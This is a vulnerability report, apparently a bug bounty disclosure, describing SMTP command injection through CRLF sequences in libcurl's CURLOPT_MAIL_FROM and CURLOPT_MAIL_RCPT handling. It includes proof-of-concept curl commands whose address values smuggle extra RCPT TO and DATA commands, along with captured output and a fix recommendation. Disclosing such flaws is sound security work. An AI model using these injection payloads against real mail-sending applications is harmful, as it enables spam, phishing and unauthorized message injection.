SMTP Command Injection via CRLF in libcurl MAIL_FROM / MAIL_RCPT (lib/smtp.c)

Summary libcurl’s SMTP implementation fails to properly sanitize CRLF sequences in user-controlled inputs passed via CURLOPT_MAIL_FROM and CURLOPT_MAIL_RCPT. The function smtp_parse_address() (lib/smtp.c:277) extracts any data following the closing > character as a raw suffix and incorporates it directly into SMTP commands using Curl_pp_sendf() without filtering control characters. This behavior enables SMTP command injection, allowing an attacker to inject arbitrary SMTP commands when applications pass unsanitized input to these options. Notably, other parts of the SMTP implementation (e.g., domain parsing at line 198 and custom commands at line 215) correctly enforce sanitization using REJECT_CTRL, highlighting an inconsistency in input validation. Tested Versions curl 8.5.0 (x86_64-pc-linux-gnu) libcurl/8.5.0 OpenSSL/3.0.13 Platform: Ubuntu 24.04.4 LTS The issue was also confirmed in the current git HEAD (commit 5fdb35a3bc) via source code review. The vulnerable logic in smtp_parse_address() remains unchanged. Root Cause At lib/smtp.c:277, the suffix portion of an email address is extracted and used without validation or sanitization of control characters (e.g., \r, \n). Unlike other code paths (lines 198 and 215), this path does not apply REJECT_CTRL, allowing CRLF injection into the SMTP command stream. Steps To Reproduce Start a local SMTP listener: nc -l -p 2525 > /tmp/smtp_raw.txt & Send a request with CRLF injection in MAIL FROM: curl --url "smtp://127.0.0.1:2525" \ --mail-from $'<[email protected]>\r\nRCPT TO:<[email protected]>' \ --mail-rcpt "[email protected]" \ --upload-file /dev/null Inspect captured traffic: cat /tmp/smtp_raw.txt Expected Behavior MAIL FROM:<[email protected]> RCPT TO:<[email protected]> Actual Behavior MAIL FROM:<[email protected]> RCPT TO:<[email protected]> RCPT TO:<[email protected]> The injected RCPT TO command is interpreted as a valid SMTP instruction. Additional Injection Vectors Injection via CURLOPT_MAIL_RCPT: curl --url "smtp://127.0.0.1:2525" \ --mail-from "[email protected]" \ --mail-rcpt $'<[email protected]>\r\nRCPT TO:<[email protected]>' \ --upload-file /dev/null Full SMTP Transaction Injection: curl --url "smtp://127.0.0.1:2525" \ --mail-from $'<[email protected]>\r\nRCPT TO:<[email protected]>\r\nDATA\r\nSubject: injected\r\n\r\ninjected body\r\n.' \ --mail-rcpt "[email protected]" \ --upload-file /dev/null This allows full control over the SMTP session, including message headers and body. Recommendation Apply consistent input validation to the suffix portion of parsed email addresses in smtp_parse_address(): Reject or sanitize control characters (\r, \n) Apply the same REJECT_CTRL logic used in other SMTP parsing paths Ensure that only valid SMTP address syntax is accepted ## Impact ## Summary: An attacker controlling input to CURLOPT_MAIL_FROM or CURLOPT_MAIL_RCPT can inject arbitrary SMTP commands, leading to: Unauthorized recipient injection (e.g., additional RCPT TO) Manipulation of SMTP transaction flow Injection of full email content (headers and body) Potential abuse for spam, phishing, or data exfiltratio